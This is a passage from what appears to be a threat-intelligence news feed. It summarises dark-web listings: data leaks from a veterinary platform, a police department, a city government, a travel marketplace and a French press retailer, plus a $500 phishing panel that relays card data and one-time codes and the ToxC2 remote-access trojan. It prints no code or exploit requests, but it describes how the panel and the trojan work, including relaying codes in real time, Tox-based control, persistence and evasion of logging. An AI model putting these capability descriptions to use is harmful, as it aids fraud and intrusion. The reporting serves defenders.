text covers what the software does rather than what the data contains. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Records claimed5,571,174 Size30 GB Price$4,000 ActorKazu ### ▣Post details TargetMyVete CountryNot stated SectorVeterinary software ListingSelling, 4,000 USD Volume5,571,174 records Dump dateStated as 2026 ObservedAug 31, 2026 ActorKazu ### !What the post claims - 5,571,174 records - 30 GB total size - Dump dated 2026 - Described as user personal data - No field list published - No sample shown in thread - Samples offered privately - Price of 4,000 US dollars - Platform holds patient records - Platform holds appointments - Platform holds billing data - Platform holds inventory - Card payments supported - Insurance claims supported - Vaccination reminders sent - Medical history tracking - Escrow offered through the forum - No mechanism described ### ◱Screenshot [ ![Forum listing selling an alleged MyVete database of over five million records, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/145379823578962987356982735897231.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/145379823578962987356982735897231.png) Forum post offering the MyVete database for sale, observed 31 August 2026. ### ☷Mapped techniques The post describes no intrusion method. Both entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred A single dated dump measured in records and gigabytes points to a platform level export rather than data taken from individual clinic accounts. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Samples and sale are handled through external messaging channels. The route out of the environment is not described. ### ⚠Potential impact If this is a platform level export rather than one clinic's records, the exposure runs across **every practice using the software**, and the people in it are pet owners who never chose the vendor. Practice management systems typically hold **owner contact details alongside billing records, and in this case card payments and insurance claims**, which would raise the exposure well above a mailing list. Scope cannot be judged from what has been published, because the post describes the product's features rather than the fields actually in the file. ### iStatus Unverified The **absence of any sample or schema in the thread is the weakness here**, since a record count and a size figure are the two easiest things in a listing to invent. The descriptive paragraph reads as **copy about the platform rather than an account of the data**, which is what a seller writes when they have not examined the file closely. The account is a few months old with a paid rank and a moderate posting history. Dark Web Informer has **not retrieved the data and is not linking the samples or contact addresses**, and MyVete has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=myvete-2026-08-31&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=myvete-2026-08-31&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=myvete-2026-08-31&utm%5Fcontent=footer) // Threat Intelligence ### 1.71 TB of Summerville Police Files Offered With Intelligence and Identity Records URL: https://darkwebinformer.com/1-71-tb-of-summerville-police-files-offered-with-intelligence-and-identity-records/ Last updated: 2026-08-31T16:22:29.000Z Breach Report United States Law Enforcement Price By Offer ## 1.71 TB of Summerville Police Files Offered With Intelligence and Identity Records A forum actor posting as **NOTORIOUS** is selling what they describe as **1.71 TB** of material taken from the **Summerville Police Department** in South Carolina. The two proof samples are of very different kinds. The first is an **internal intelligence document on departmental letterhead, marked for police use only and not for dissemination**, listing named individuals with dates of birth, recorded aliases and alleged gang affiliations. The second is a set of **identity documents for a single named person**, comprising a social security card, a state driving licence with photograph and a certified birth certificate naming both parents. No record count or intrusion method is given. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Size1.71 TB RecordsNot stated ListingFor sale ActorNOTORIOUS ### ▣Post details TargetSummerville Police Department CountryUnited States SectorLaw enforcement ListingSelling, price by offer Volume1.71 TB Stated sourceNot described ObservedAug 27, 2026 ActorNOTORIOUS ### !What the post claims - 1.71 TB of material - Internal police documents - Departmental letterhead - Marked for police use only - Marked not for dissemination - Named individuals - Dates of birth - Recorded aliases - Alleged gang affiliations - Identity documents - Social security cards - State driving licences - Licence photographs - Certified birth certificates - Parents named on records - Residential addresses - No record count given - No mechanism described ### ◱Screenshots [ ![Forum listing offering files attributed to a South Carolina police department for sale, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/72375982978365978236598723656987235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/72375982978365978236598723656987235.png) [ ![Second proof image in the same listing showing identity documents, shown redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/72375982978365978236598723656987236.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/72375982978365978236598723656987236.png) Forum post offering Summerville Police Department files for sale, observed 27 August 2026. ### ☷Mapped techniques The post describes no intrusion method. All entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred Intelligence products and scanned case attachments sit together in departmental records systems rather than in any single public source. - Collection [T1530](https://attack.mitre.org/techniques/T1530/) Data from cloud storage Inferred A volume of this size is consistent with a document and media store, most likely including case files, images and recordings, rather than a database export. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Proof images are hosted externally and the sale is arranged through a messaging contact. The route out of the environment is not described. ### ⚠Potential impact Police intelligence lists record **suspicion, not conviction**, and the people named in them have no way to contest an entry they were never told about. Exposure of a document like this risks **retaliation, misidentification and lasting harm to people who may never have been charged**, and several of the birth years shown indicate entries compiled when the individuals were children. The identity documents raise a separate problem: a social security number, a photographic licence and a birth certificate together form **a complete and permanent identity kit**, none of which can be reissued to undo the disclosure. If 1.71 TB is accurate, the sample is a fragment and the rest will contain case material, witnesses and complainants. ### iStatus Unverified The evidence offered is **two images and a size figure**, with no record count, no file listing and no account of how the material was obtained. The account is **recent and carries no standing**, and posted a separate government leak claim hours earlier, which is a pattern worth weighing. Dark Web Informer has **not retrieved the files and is not linking them**, nor the contact address. The department has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=summerville-police-2026-08-27&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=summerville-police-2026-08-27&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=summerville-police-2026-08-27&utm%5Fcontent=footer) // Threat Intelligence ### Baguio City Government Files Released Free With Permits, Titles and ID Cards URL: https://darkwebinformer.com/baguio-city-government-files-released-free-with-permits-titles-and-id-cards/ Last updated: 2026-08-31T16:12:25.000Z Breach Report Philippines Local Government Released Free ## Baguio City Government Files Released Free With Permits, Titles and ID Cards A forum actor posting as **NOTORIOUS** has published **3.23 GB** of material attributed to the **City Government of Baguio** in the Philippines, released free rather than sold. The two proof samples point at **construction and building control records**: a completed unified building permit application, an issued building permit naming the owner, the property title number, the construction address, the occupancy classification and the total project cost, and a **Professional Regulation Commission identity card carrying a photograph, full name and licence number**. No record count, file list or intrusion method is given. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Size3.23 GB RecordsNot stated DistributionFree ActorNOTORIOUS ### ▣Post details TargetCity Government of Baguio CountryPhilippines SectorLocal government ListingFree download Volume3.23 GB Stated sourceNot described ObservedAug 27, 2026 ActorNOTORIOUS ### !What the post claims - 3.23 GB released free - City government records - Building permit applications - Issued building permits - Professional licence cards - Photographs on licence cards - Licence registration numbers - Applicant and owner names - Property title numbers - Construction addresses - Barangay and postal codes - Occupancy classification - Scope of work - Total project costs - Supervising professionals named - Official receipt references - Signatures and official stamps - No record count given ### ◱Screenshot [ ![Forum post publishing files attributed to the City Government of Baguio, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/124789157861487569817625987124.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/124789157861487569817625987124.png) Forum post publishing City Government of Baguio files, observed 27 August 2026. ### ☷Mapped techniques The post describes no intrusion method. All entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred The proof material spans applications, issued permits and supporting identity documents, which sit together in a permitting system rather than in any one public record. - Collection [T1530](https://attack.mitre.org/techniques/T1530/) Data from cloud storage Inferred Several gigabytes of scanned forms and identity cards indicate a document store was reached, not only a database. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution runs through an external file host linked from the post. The route out of the environment is not described. ### ⚠Potential impact Permit files are unusual because they **bundle three separate things into one folder**: a scanned identity document for the professional, a named property with its title number and address, and a stated project value. That combination supports **impersonation of licensed professionals**, whose signature carries legal weight on construction approvals, and it produces a ready made list of **high value properties with owners' names attached**. For the individuals in it the exposure is permanent, since a licence card and a land title reference cannot be reissued to undo the disclosure. ### iStatus Unverified The evidence offered is **two documents and a size figure**, with no record count, no file listing and no account of how the material was obtained. The account is **recent and carries no standing**, and the release is free, so nothing about the posting itself supports the claim. Dark Web Informer has **not retrieved the files and is not linking them**. The city government has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=baguio-city-2026-08-27&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=baguio-city-2026-08-27&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=baguio-city-2026-08-27&utm%5Fcontent=footer) // Threat Intelligence ### A 500 Dollar Phishing Panel Built to Relay Card Details and One Time Codes URL: https://darkwebinformer.com/a-500-dollar-phishing-panel-built-to-relay-card-details-and-one-time-codes/ Last updated: 2026-08-28T16:50:25.000Z Tooling Listing Phishing Panel Card and OTP 500 USD ## A 500 Dollar Phishing Panel Built to Relay Card Details and One Time Codes A seller posting as **PAL1T** is advertising a **live phishing panel** at **500 dollars**, presented as version 1.0 and aimed at capturing **card data together with one time passcodes**. The design is built around working a victim in real time: entries appear in the panel and in a messaging bot at once, each carries an **online presence check and a countdown showing how recently the code was refreshed**, and the operator can push the victim onward to the genuine site or mark the attempt as declined or successful. It also offers **up to five read only guest accounts** with instant revocation, bulk export, and paid customisation. Domain and hosting are **not included**. Capabilities are **as advertised and unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Price$500 Version1.0 TargetsCard and OTP SellerPAL1T ### ▣Listing details ProductLive phishing panel TypeReal time credential relay CountryNot stated Price500 USD ExcludedDomain and server Version1.0, updates included ObservedAug 27, 2026 SellerPAL1T ### !What the listing claims - Live view of victim sessions - Card data capture - One time code capture - Entries mirrored to a messaging bot - Two way sync between bot and panel - Code freshness countdown - Online presence check per entry - Redirect to the genuine site - Manual or automatic outcome status - Declined and successful states - Counters for waiting and active victims - Quick copy of individual fields - Bulk export of captured rows - Database deletion control - Up to five guest accounts - Guest access is view only - Instant revocation of guest access - Optional sound alerts ### ◱Screenshots [ ![Forum listing advertising a live phishing panel for card and one time code capture, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/238095237657286935987623598762359786987.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/238095237657286935987623598762359786987.png) [ ![Second section of the same listing covering guest accounts, controls and price, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/238095237657286935987623598762359786988.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/238095237657286935987623598762359786988.png) Forum listing advertising a live phishing panel, observed 27 August 2026. ### ☷Mapped techniques Mapped from the seller's own description. Advertised, not confirmed. - Initial access [T1566](https://attack.mitre.org/techniques/T1566/) Phishing Stated The product is a hosted phishing front end, sold without the domain or server the buyer must supply. - Credential access [T1557](https://attack.mitre.org/techniques/T1557/) Adversary in the middle Stated The operator watches the session live and can hand the victim back to the genuine site once the data is captured. - Credential access [T1111](https://attack.mitre.org/techniques/T1111/) Multi factor authentication interception Stated Codes are surfaced with a countdown showing how recently each was received, which only matters if they are being used before expiry. - Collection [T1056.003](https://attack.mitre.org/techniques/T1056/003/) Web portal capture Stated Submitted card and authentication fields are stored, exportable in bulk and individually copyable. ### ⚠Potential impact The countdown timer is the tell. A panel that tracks **how fresh each code is** exists to use those codes inside their validity window, which is what defeats card authentication and SMS based verification. At **500 dollars, with guest accounts and outcome tracking**, this is tooling for a small team working victims in shifts rather than a single operator. The defensive conclusion is the familiar one: **anything delivered as a code to a phone can be relayed in real time**, and only phishing resistant authentication removes the attack. ### iStatus Unverified Everything here is a sales claim, with **no live instance, screenshots of the panel or artefacts published**, so there is nothing defenders can turn into a detection signature. The seller account has **a light history and little standing**. Dark Web Informer has **not obtained the panel and is not linking the seller's contact channel**. Want everything on this listing? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=live-panel-cc-otp-2026-08-27&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=live-panel-cc-otp-2026-08-27&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=live-panel-cc-otp-2026-08-27&utm%5Fcontent=footer) // Threat Intelligence ### ToxC2 Sells a Cross Platform Agent That Runs Its Command Channel Over Tox URL: https://darkwebinformer.com/toxc2-sells-a-cross-platform-agent-that-runs-its-command-channel-over-tox/ Last updated: 2026-08-28T16:38:15.000Z Malware Listing Remote Access Trojan Windows, macOS, Linux 70 USD ## ToxC2 Sells a Cross Platform Agent That Runs Its Command Channel Over Tox A seller posting as **Reze** is advertising **ToxC2**, a command and control agent priced at **70 dollars** for builds covering Windows, macOS and Linux. The distinguishing feature is the channel: rather than calling home to a server, the implant **sends a contact request to the operator over the Tox messaging protocol** and is then driven by text commands in an ordinary chat client. The listing describes an interactive shell on each platform, file retrieval, screen, webcam and microphone streaming, autorun persistence on all three operating systems, **anti analysis checks and tampering with Windows logging and script scanning interfaces**, and self deletion on machines that appear to be in the seller's own region. Capabilities are **as advertised and unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Price$70 PlatformsThree C2 channelTox SellerReze ### ▣Listing details ProductToxC2 TypeC2 agent, remote access CountryNot stated PlatformsWindows, macOS, Linux Price70 USD, three builds BuildStatic C binary, about 2 MB ObservedAug 27, 2026 SellerReze ### !What the listing claims - Control through a chat client - Operator added by contact request - Persistent interactive shell - PowerShell on Windows - Shell on a PTY for Linux and macOS - File download from the host - File delivery to the host - Desktop streaming - Webcam streaming - Microphone capture - System and drive enumeration - Process and network listing - Geolocation lookup - Power and session control - Logging and script scanning tampering - Debugger, VM and sandbox checks - Autorun on all three systems - Self deletion on command ### ◱Screenshots [ ![Forum listing advertising a cross platform command and control agent named ToxC2, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1249781938275698273569873429872356987153.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1249781938275698273569873429872356987153.png) [ ![Second section of the same listing stating price and delivery terms, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1249781938275698273569873429872356987154.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1249781938275698273569873429872356987154.png) Forum listing advertising the ToxC2 agent, observed 27 August 2026. ### ☷Mapped techniques Mapped from the seller's own description. Advertised, not confirmed. - Command and control [T1071](https://attack.mitre.org/techniques/T1071/) Application layer protocol Stated Control runs entirely over a peer to peer messaging protocol, with the operator reached as a chat contact rather than through a server the implant connects back to. - Execution [T1059](https://attack.mitre.org/techniques/T1059/) Command and scripting interpreter Stated A shell is held open for the session, using PowerShell on Windows and a terminal on Linux and macOS. - Persistence [T1547](https://attack.mitre.org/techniques/T1547/) Boot or logon autostart execution Stated Autorun is established on first execution using the startup folder on Windows, a user service and scheduled task on Linux, and a launch agent on macOS. - Defense evasion [T1562.001](https://attack.mitre.org/techniques/T1562/001/) Disable or modify tools Stated The Windows build claims to patch the event tracing and script scanning interfaces that endpoint products rely on for visibility. - Defense evasion [T1497](https://attack.mitre.org/techniques/T1497/) Virtualisation and sandbox evasion Stated Optional checks for debuggers, virtual machines and analysis sandboxes are offered as a build option. - Discovery [T1614.001](https://attack.mitre.org/techniques/T1614/001/) System language discovery Stated Keyboard layout and locale are read to identify machines in the seller's own region, where the implant removes itself. - Collection [T1113](https://attack.mitre.org/techniques/T1113/) Screen capture Stated Desktop streaming is offered alongside webcam capture and microphone listening, each through the native capture framework of the platform. ### ⚠Potential impact The capability list is unremarkable for a remote access tool. **The transport is the part worth attention.** Because control runs over a peer to peer messaging network, there is **no domain to sinkhole, no address to block and no certificate to inspect**, and traffic looks like an ordinary chat client rather than beaconing to infrastructure. Defences that lean on network indicators lose most of their grip, which pushes detection back onto **host behaviour**: an unexpected process holding a shell open, autorun entries in the startup folder, a user level service and scheduled task, or a launch agent that nobody installed. The **region check is also informative**, since an implant that deletes itself on machines matching the seller's own locale tells you where the operator is and where victims will not be. At **70 dollars for three platforms**, the barrier is low enough that this lands with unskilled buyers rather than organised operations, which usually means noisy, opportunistic use against individuals rather than targeted intrusion. One claim in the listing **contradicts another**: it advertises that nothing is written to disk, while also describing autorun entries and a binary that can later delete itself. Both cannot be true, and the persistence description is the more credible of the two. ### iStatus Unverified Everything here is **a sales claim**. No sample, hash or build has been published, so none of the evasion or streaming capability can be checked, and there is **nothing for defenders to use as a detection artefact** beyond the behaviours described. The seller account is **new and carries almost no standing**, registered within the last six months with a handful of posts and a token deposit, which on this kind of forum is the profile of an untested vendor rather than an established one. The stated test matrix is worth noting: the macOS coverage is described against a **release now several major versions old**, which predates much of the current consent framework governing camera, microphone and screen recording access. If accurate, that suggests the macOS build is considerably less capable in practice than the listing implies. Dark Web Informer has **not obtained the builds and is not linking the seller's contact channel** or the hosted screenshots. Want everything on this listing? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=toxc2-2026-08-27&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=toxc2-2026-08-27&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=toxc2-2026-08-27&utm%5Fcontent=footer) // Threat Intelligence ### Roomer Travel Account Data on More Than 200,000 Users Shared on a Forum URL: https://darkwebinformer.com/roomer-travel-account-data-on-more-than-200-000-users-shared-on-a-forum/ Last updated: 2026-08-27T18:27:01.000Z Breach Report Travel Marketplace Shared Free No Passwords in Sample ## Roomer Travel Account Data on More Than 200,000 Users Shared on a Forum A forum actor posting as **slvsh3r** has published what they describe as the client database of **Roomer Travel**, a marketplace and mobile app for buying and reselling non refundable hotel reservations. The post claims **more than 200,000 records** and the sample shows account identifiers, first and last names, usernames, email addresses, verification flags, currency preferences and referral codes. Fields for **phone number, postal address, credit balance and payout configuration are present in the schema but empty in every visible row**, and no password field appears at all. The files are unlocked for a nominal forum fee. The claim is **unverified**. Severity MODERATE [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Records claimed200,000+ EmailsPresent Payment fieldsEmpty Actorslvsh3r ### ▣Post details TargetRoomer Travel CountryNot stated SectorTravel marketplace ListingForum points to unlock Volume200,000+ claimed Stated sourceNot described ObservedAug 27, 2026 Actorslvsh3r ### !What the post claims - More than 200,000 records - Account identifiers - First and last names - Usernames - Email addresses - Account verified flags - Currency preference - Referral codes - Credit balance fields - Payout configuration fields - Stripe enabled flag - PayPal account field - Address fields present but empty - Phone fields present but empty - Profile photo field - No password field in sample - Automated or test accounts visible - Sequential identifiers ### ◱Screenshot [ ![Forum post publishing account data attributed to the travel marketplace Roomer, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2978056728635798623597862398756978235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2978056728635798623597862398756978235.png) Forum post publishing Roomer Travel account data, observed 27 August 2026. ### ☷Mapped techniques The post describes no intrusion method. Both entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred Records appear as nested objects with sequential identifiers and empty optional branches, which reads as a serialised export from an application rather than a scrape of profile pages. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution runs through forum hosting behind a points wall. The route out of the environment is not described. ### ⚠Potential impact This is a **thin set by the standards of what it advertises**. Strip out the empty branches and what remains is a name, a username and an email address per account, with no passwords, no addresses, no phone numbers and no payment identifiers populated anywhere in the sample. As a privacy matter that is limited. Where it has value is **context**: everyone in this file is a user of a marketplace for reselling hotel bookings that cannot be refunded, which means a good proportion of them have **either lost money on a trip or are trying to recover some of it**. That is an unusually receptive audience for refund and rebooking fraud, and a message referencing a real account, a real username and the correct platform will clear the first bar of suspicion for many of them. Two things deserve checking against the full file rather than the sample. Whether the **payout fields are populated anywhere**, since a PayPal address tied to a named seller is a materially different exposure, and whether **address and phone are filled for the subset who completed transactions**, which is where a partial export would show its seams. ### iStatus Unverified The sample carries **one detail that argues for authenticity**: several records contain machine generated gibberish in the name fields, the sort of automated or test account that accumulates in any real production table and that someone fabricating a file would have no reason to invent. Identifiers also run **sequentially in a narrow band well above the claimed record count**, which is consistent with a slice of a larger table rather than a complete export, and sits awkwardly with the headline figure. Set against that, **no intrusion method, date or access route is given**, the volume cannot be checked from what is shown, and the near total absence of populated optional fields means the set may be far less complete than the count suggests. The account is **established, with a purchased forum rank**. Dark Web Informer has **not retrieved the file and is not linking it**, nor the archive credentials. Roomer Travel has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=roomer-travel-2026-08-27&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=roomer-travel-2026-08-27&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=roomer-travel-2026-08-27&utm%5Fcontent=footer) // Threat Intelligence ### Journaux.fr Delivery Records Shared Alongside an Unpatched Credit Flaw URL: https://darkwebinformer.com/journaux-fr-delivery-records-shared-alongside-an-unpatched-credit-flaw/ Last updated: 2026-08-27T18:15:38.000Z Breach Report France Press and Subscriptions Shared Free ## Journaux.fr Delivery Records Shared Alongside an Unpatched Credit Flaw A forum actor posting as **Alduin** has published what they describe as the billing data of **journaux.fr**, a French site selling newspapers and magazines by issue or subscription in print and digital form. The release is given as **JSONL covering roughly 270,000 records**, containing paired **delivery and billing details**: names, street addresses, building and additional address lines, postcodes, cities, countries, company names where present, and order identifiers. Alongside the data, the post publishes **an API request the actor says lets an authenticated customer set their own account credit balance** up to a stated ceiling. Dark Web Informer is not reproducing that request. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Records claimed270,000 FormatJSONL Live flawPublished ActorAlduin ### ▣Post details Targetjournaux.fr CountryFrance SectorPress and subscriptions ListingFree, reply to unlock Volume270,000 claimed Stated size184 KB ObservedAug 27, 2026 ActorAlduin ### !What the post claims - 270,000 records - JSONL format - Stated size of 184 KB - Delivery names - Delivery addresses - Building and complement lines - Postcodes and cities - Delivery country - Billing names - Billing addresses - Company names where present - Salutation codes - VAT fields - Order identifiers - Requested order identifiers - An API flaw disclosed openly - Account credit said to be settable - A stated ceiling on the amount ### ◱Screenshot [ ![Forum post publishing billing and delivery data attributed to the French press retailer journaux.fr, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2789562789635967824359876235978698723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2789562789635967824359876235978698723.png) Forum post publishing journaux.fr billing data, observed 27 August 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1190](https://attack.mitre.org/techniques/T1190/) Exploit public facing application Inferred The actor demonstrates detailed knowledge of the site's API and of at least one endpoint that fails to check authorisation, which is a plausible route to the records as well. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred Paired delivery and billing objects with sequential order identifiers suggest records pulled in bulk rather than one account at a time. - Impact [T1657](https://attack.mitre.org/techniques/T1657/) Financial theft Stated The published request, if it works as described, allows an account holder to grant themselves store credit and obtain goods without paying for them. ### ⚠Potential impact The records themselves are **ordinary as personal data goes**. Names and delivery addresses for a few hundred thousand French households, with no passwords, no card numbers and no account credentials. The realistic harm is targeted postal and telephone fraud, helped along by the fact that a **subscription address is a confirmed, currently occupied delivery address** rather than a form field somebody typed once. The more pressing problem belongs to the company. If the published request behaves as described, **any account holder can grant themselves store credit**, which is straightforward theft of goods and is now public, unpatched and trivially repeatable by anyone reading the thread. That flaw also reframes the leak, because an API that fails to check who is authorised to change a balance **may well be failing to check who is authorised to read other people's orders**, which would explain how the records were obtained without any conventional intrusion. For the retailer this is an incident response matter measured in hours rather than days. ### iStatus Unverified There is an **arithmetic problem worth resolving before anyone reports the headline figure**. The post claims roughly 270,000 records but gives the file size as 184 KB, and each record in the sample runs to several hundred bytes across two address blocks. A file of that size holds a few hundred records of this shape, not a quarter of a million, so **either the size refers to a sample, the file is compressed, or the record count is wrong**. The sample content is otherwise convincing, with real French postcodes matched to the correct communes and the ragged mixture of blank and populated fields that genuine order data carries. The **account is recent, created within the last two months**, with few posts and a purchased forum rank, so its standing carries little weight. Distribution is free, so no price is being defended. Dark Web Informer has **not retrieved the file and is not linking it**, and is **not reproducing the API request**. Journaux.fr has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat 